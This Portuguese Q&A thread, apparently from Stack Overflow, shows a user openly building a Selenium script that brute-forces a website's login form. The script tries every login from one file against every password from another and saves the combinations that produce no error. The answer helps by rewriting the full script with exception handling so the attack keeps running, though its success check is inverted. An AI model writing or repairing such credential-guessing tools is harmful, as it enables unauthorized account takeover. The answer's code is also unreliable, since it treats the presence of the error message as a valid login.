# Verificar se o Elemento existe com Selenium

Tags: python, selenium-webdriver

Estou fazendo uma espécie de bruteforce utilizando o selenium, quando erro a senha e o login, aparece a mensagem na tela de login ou senha inválidos, caso a mensagem não apareça, ou seja, login e senha corretos, eu salvo o login e a senha num arquivo.
Acontece que quando o login e a senha são corretas, o selenium não encontra a mensagem de erro, logo cai num traceback, e encerra a aplicação.
Não consegui fazer a validação para ele continuar rodando até encontrar todas as senhas.

```py
from selenium import webdriver
import time

arquivo_login = open("login.txt", "r")
arquivo_senha = open("senha.txt", "r")

lista_login = arquivo_login.readlines()
lista_senha = arquivo_senha.readlines()

print(len(lista_login))
print(len(lista_senha))

cont = 0

firefox = webdriver.Firefox()
#firefox = webdriver.Chrome()

for i in range (0, len(lista_login)):
    for j in range (0, len(lista_senha)):
        firefox.get('https://meusite.com.br/')
        login = firefox.find_element_by_name('login')
        password = firefox.find_element_by_name('passwd')
        cont = cont + 1
        print(cont, "- Login:", lista_login[i], " senha: ", lista_senha[j])
        login.send_keys(lista_login[i])
        password.send_keys(lista_senha[j])
        submit = firefox.find_element_by_id('Log_On')
        submit.click()
        time.sleep(2)

        if(firefox.find_element_by_id('errorMessageLabel').text == ''):
            print("Login inválido")
        else:
            arq = open("combinacao.txt","w")
            combinacao = []
            combinacao.append("Login:")
            combinacao.append(lista_login[i])
            combinacao.append("Senha: ")
            combinacao.append(lista_senha[j])
            arq.writelines(combinacao)          

arq.close()
arquivo_login.close()
arquivo_senha.close()
```

Eu uso um arquivo com X logins e outro com Y senhas, daí testo cada login com cada senha, até aí tudo bem, a questão é que verifico através da mensagem de erro no site, porém quando o login é correto, a mensagem de erro não acontece, e aí gera um erro e não testa os outros itens.

Answer (score 1):

Você pode tratar as exceções geradas pelo selenium se eles estiverem em um try except.

Uma forma de resolver isso é inserir um try except dentro do seu for e emitir apenas uma mensagem de erro, assim seu cod. não vai parar até que termine o for.

Ou melhor, você pode inserir apenas no local onde está esperando o erro.

Neste caso fica assim:

```
from selenium import webdriver
import time

arquivo_login = open("login.txt", "r")
arquivo_senha = open("senha.txt", "r")

lista_login = arquivo_login.readlines()
lista_senha = arquivo_senha.readlines()

print(len(lista_login))
print(len(lista_senha))

cont = 0

firefox = webdriver.Firefox()
#firefox = webdriver.Chrome()

for i in range (0, len(lista_login)):
    for j in range (0, len(lista_senha)):
        firefox.get('https://meusite.com.br/')
        login = firefox.find_element_by_name('login')
        password = firefox.find_element_by_name('passwd')
        cont = cont + 1
        print(cont, "- Login:", lista_login[i], " senha: ", lista_senha[j])
        login.send_keys(lista_login[i])
        password.send_keys(lista_senha[j])
        submit = firefox.find_element_by_id('Log_On')
        submit.click()
        time.sleep(2)

        try:
            firefox.find_element_by_id('errorMessageLabel')
            print("Login válido")
            arq = open("combinacao.txt","w")
            combinacao = []
            combinacao.append("Login:")
            combinacao.append(lista_login[i])
            combinacao.append("Senha: ")
            combinacao.append(lista_senha[j])
            arq.writelines(combinacao)   
        except: 
            print("Login inválido")

arq.close()
arquivo_login.close()
arquivo_senha.close()
```